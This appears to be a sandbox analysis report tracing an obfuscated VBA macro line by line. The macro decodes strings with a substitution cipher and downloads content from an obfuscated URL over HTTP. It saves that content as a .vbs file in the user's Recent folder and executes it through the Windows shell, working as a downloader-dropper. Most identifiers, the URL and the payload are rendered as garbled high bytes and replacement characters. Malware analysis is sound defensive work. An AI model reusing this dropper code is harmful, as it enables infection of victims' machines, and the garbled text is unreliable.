                                              \xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae = \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.responseBody

                                              responseBody

                                              38

                                              If \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.Status = 200 Then

                                              IXMLHTTPRequest.Status() -> 200

                                              executed
                                              39

                                              Set \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae = CreateObject("adodb.stream")

                                              CreateObject("adodb.stream")

                                              executed
                                              40

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Open

                                              Stream.Open()

                                              executed
                                              41

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Type = \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4

                                              Type

                                              42

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Write \xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae

                                              Stream.Write(<binary payload; the report viewer renders its unprintable bytes as "?" and U+FFFD, so the dump is omitted here>)

                                              executed
                                              43

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.SaveToFile \xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab, \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4 + \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4

                                              SaveToFile

                                              44

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Close

                                              Close

                                              45

                                              Endif

                                              46

                                              \xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4.Open (\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab)

                                              IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs")

                                              executed
                                              47

                                              End Sub

                                              APIs | Meta Information

                                              Len

                                              Len("\V\xfffdM\xfffd\xfffdV.vb\xfffd") -> 12
                                              Len("h\xfffd\xfffd\xfffd\xfffd://www.\xfffd\xfffd\xfffd\xfffd\xfffdm\xfffd\xfffd\xfffd.\xfffd\xfffdm/\xfffd\xfffdgdh\xfffd\xfffdjh\xfffdd\xfffd\xfffdjh\xfffd\xfffddgj\xfffd/\xfffd\xfffd\xfffdh\xfffdgdhg\xfffd\xfffdjw\xfffdqw\xfffdgw\xfffd\xfffdwg/vb\xfffd\xfffdjzbdkj\xfffdbg\xfffdz\xfffdkld\xfffdbg\xfffd/\xfffd\xfffdh\xfffdd\xfffdhgj\xfffd\xfffdg\xfffdh\xfffdz.vb\xfffd") -> 116

                                              InStr


                                              Mid

                                              Mid

                                              Mid

                                              Strings | Decrypted Strings
                                              " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"
                                              " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"
                                              Line | Instruction | Meta Information
                                              70

                                              Public Function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2)

                                              71

                                              \xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf\xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2 = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"

                                              72

                                              \xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7 = " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"

                                              73

                                              For w = 1 To Len(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2)

                                              Len("\V\xfffdM\xfffd\xfffdV.vb\xfffd") -> 12

                                              executed
                                              74

                                              \xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf = InStr(\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf\xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2, Mid(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2, w, 1))

                                              InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0

                                              Mid

                                              executed
                                              75

                                              If \xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf > 0 Then

                                              76

                                              \xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe = Mid(\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7, \xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf, 1)

                                              Mid

                                              77

                                              \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 = \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 + \xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe

                                              78

                                              Else

                                              79

                                              \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 = \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 + Mid(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2, w, 1)

                                              Mid

                                              80

                                              Endif

                                              81

                                              Next

                                              Len("\V\xfffdM\xfffd\xfffdV.vb\xfffd") -> 12

                                              executed
                                              82

                                              \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6 = \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8

                                              83

                                              End Function

                                              APIs | Meta Information

                                              fthdsthdfAxgfhhd

                                              fthdsthdfAxgfhhd

                                              Line | Instruction | Meta Information
                                              49

                                              Function xghxfcBropn() as Byte

                                              50

                                              xghxfcBropn = 111

                                              51

                                              Call xdfzfgxdb()

                                              52

                                              Function xdfzfgxdb() As Boolean ' BAD !

                                              53

                                              xdfzfgxdb = False

                                              54

                                              Call Zoorroom()

                                              55

                                              Function Zoorroom() As Double ' BAD !

                                              56

                                              Zoorroom = Zoorroom

                                              57

                                              Call hormmmom()

                                              58

                                              Function hormmmom() As Variant ' BAD !

                                              59

                                              hormmmom = timong

                                              60

                                              Function timong() As Long ' BAD !

                                              61

                                              timong = fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh

                                              62

                                              fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh As Byte ' BAD !

                                              63

